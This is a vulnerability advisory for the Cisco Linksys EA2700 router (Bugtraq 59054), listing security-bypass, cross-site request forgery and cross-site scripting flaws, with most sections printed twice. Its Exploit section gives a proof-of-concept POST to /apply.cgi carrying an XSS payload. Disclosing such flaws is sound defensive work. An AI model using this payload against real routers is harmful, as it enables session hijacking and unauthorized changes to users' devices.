Cisco Linksys EA2700 Router Multiple Security Vulnerabilities
BID:59054
Info
Cisco Linksys EA2700 Router Multiple Security Vulnerabilities
| Bugtraq ID: | 59054 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 15 2013 12:00AM |
| Updated: | Apr 15 2013 12:00AM |
| Credit: | Phil Purviance |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Cisco Linksys EA2700 Router Multiple Security Vulnerabilities
Cisco Linksys EA2700 routers is prone to the following security vulnerabilities:
1. A security-bypass vulnerability
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability
An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session.
Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable.
Cisco Linksys EA2700 routers is prone to the following security vulnerabilities:
1. A security-bypass vulnerability
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability
An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session.
Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable.
Exploit / POC
Cisco Linksys EA2700 Router Multiple Security Vulnerabilities
An attacker can exploit these issues through a browser. To exploit cross-site scripting and cross-sire request-forgery issues, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example request is available:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
submit_button=xss'%3balert(1)//934&action=Apply
An attacker can exploit these issues through a browser. To exploit cross-site scripting and cross-sire request-forgery issues, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example request is available:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
submit_button=xss'%3balert(1)//934&action=Apply
Solution / Fix
Cisco Linksys EA2700 Router Multiple Security Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Cisco Linksys EA2700 Router Multiple Security Vulnerabilities
References:
References: